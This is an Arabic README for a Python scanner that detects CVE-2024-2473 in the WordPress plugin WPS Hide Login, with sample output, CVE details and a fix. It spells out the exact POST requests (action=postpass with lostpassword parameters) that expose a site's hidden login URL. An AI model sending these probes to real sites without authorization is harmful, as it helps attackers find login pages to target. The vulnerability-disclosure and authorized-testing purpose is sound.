
كشف صفحة تسجيل الدخول المخفية في ووردبريس. يكتشف كشف صفحة تسجيل الدخول في مواقع ووردبريس التي تستخدم WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)
ماسح احترافي مكتوب بلغة Python لكشف صفحة تسجيل الدخول المكشوفة في مواقع WordPress التي تعمل بإضافة WPS Hide Login ≤ 1.9.15.2
ببرمجة Venexy
WPS Hide Login هي إضافة شهيرة لـ WordPress تتيح للمدراء تغيير مسار /wp-login.php الافتراضي إلى مسار مخصص ومخفي — وهو ما يمثّل أمانًا عبر الغموض.
يكشف هذا الماسح CVE-2024-2473، وهي ثغرة تتيح إرسال مُعامِل action=postpass لتجاوز آلية حماية الإضافة بالكامل، مما يكشف عنوان صفحة تسجيل الدخول المخفية للمهاجمين غير المصادَق عليهم.
تنقل إضافة WPS Hide Login صفحة تسجيل الدخول في WordPress من المسار الافتراضي /wp-login.php إلى عنوان URL مخصص يختاره المدير. غير أنه في جميع الإصدارات حتى 1.9.15.2 وما يشملها، يؤدي إرسال مُعامِل الاستعلام action=postpass إلى /wp-login.php أو /wp-admin/ إلى تجاوز هذه الحماية، وكشف عنوان الإجراء الفعلي لنموذج تسجيل الدخول المخفي — مما يفضح مسار تسجيل الدخول السري أمام أي مهاجم غير مصادَق عليه.
يحاكي الماسح تسلسل هجوم الثغرة عبر ثلاث مراحل:
Phase 1 ─► Confirm target is a WordPress installation
│
▼
Phase 2a ─► POST /wp-login.php?action=postpass
with body: action=lostpassword&post_password=test
Check: HTTP 200 + lostpasswordform present + no wp-login.php in body
Extract hidden login URL from form action attribute
│
Phase 2b ─► POST /wp-admin/?action=postpass
Check: HTTP 302 redirect to location containing reauth=1 or /login
│
▼
Report hidden login URL if discovered
إذا تحقّق أيٌّ من المرحلتين 2a أو 2b، يُصنَّف الهدف على أنه مُعرَّض للثغرة.
requests1. استنساخ المستودع
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473
2. تثبيت التبعيات
pip install requests
ملاحظة: على الأنظمة التي تستخدم البيئات الافتراضية لـ Python أو توزيعة Kali Linux، قد تحتاج إلى:
pip install requests --break-system-packages
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]
| الوسيطة | الوصف | الافتراضي |
|---|---|---|
-u, --url | عنوان قاعدة WordPress المستهدف |
# Basic scan
python CVE-2024-2473.py -u https://example.com
# Scan with custom timeout
python CVE-2024-2473.py -u https://example.com --timeout 15
# Scan over HTTP
python CVE-2024-2473.py -u http://192.168.1.100
...
┌─────────────────────────────────────────────────────────────┐
│ CVE-2024-2473 • WPS Hide Login Page Identifier │
│ Coded by Venexy | https://github.com/m4xsec │
└─────────────────────────────────────────────────────────────┘
===============================================================
TARGET https://example.com
TIME 2024-11-01 18:00:00
TIMEOUT 10s
===============================================================
[18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
[18:00:01] [+] WordPress confirmed — https://example.com
[18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...
[18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
+- Status : 200 Result : MATCH
[18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
+- Status : 302 Result : MATCH
###############################################################
## VULNERABILITY CONFIRMED -- CVE-2024-2473 ##
###############################################################
Plugin WPS Hide Login <= 1.9.15.2
Severity Medium (CVSS 5.3 / EPSS 93rd percentile)
CWE CWE-200 — Exposure of Sensitive Information
CVSS Vector AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
[18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass
====================================================
HIDDEN LOGIN URL DISCOVERED
====================================================
>> https://example.com/my-secret-admin-path/
====================================================
هذه الأداة مخصصة لاختبارات الاختراق المصرَّح بها والأغراض التعليمية فقط.
لا يتحمّل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ينجم عن هذه الأداة. احصل دائمًا على إذن كتابي صريح من مالك النظام المستهدف قبل إجراء أي تقييم أمني. يُعد الفحص غير المصرَّح به أو استغلال الأنظمة أمرًا غير قانوني وغير أخلاقي.
استخدمها بمسؤولية.
بُرمجت بـ ❤️ بواسطة Venexy
إذا كانت هذه الأداة مفيدة لك، ففكّر في منح المستودع ⭐🌟🌟🌟
| الحقل | التفاصيل |
|---|
| معرّف CVE | CVE-2024-2473 |
| الإصدارات المتأثرة | إضافة WPS Hide Login ≤ 1.9.15.2 لـ WordPress |
| درجة الخطورة | متوسطة |
| نقاط CVSS | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| CWE | CWE-200 — كشف المعلومات الحساسة |
| نقاط EPSS | 0.10433 (النسبة المئوية 93) |
| مصادقة مطلوبة | لا |
| المطوِّر | WPServeur |
| المعالجة | تحديث الإضافة إلى إصدار أحدث من 1.9.15.2 |
| — |
-t, --timeout | مهلة طلب HTTP بالثواني | 10 |
| المصدر | الرابط |
|---|
| NVD — CVE-2024-2473 | https://nvd.nist.gov/vuln/detail/CVE-2024-2473 |
| نشرة Wordfence الأمنية | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure |
| إضافة WPS Hide Login | https://wordpress.org/plugins/wps-hide-login/ |
| CWE-200 | https://cwe.mitre.org/data/definitions/200.html |
| حاسبة CVSS 3.1 | https://www.first.org/cvss/calculator/3.1 |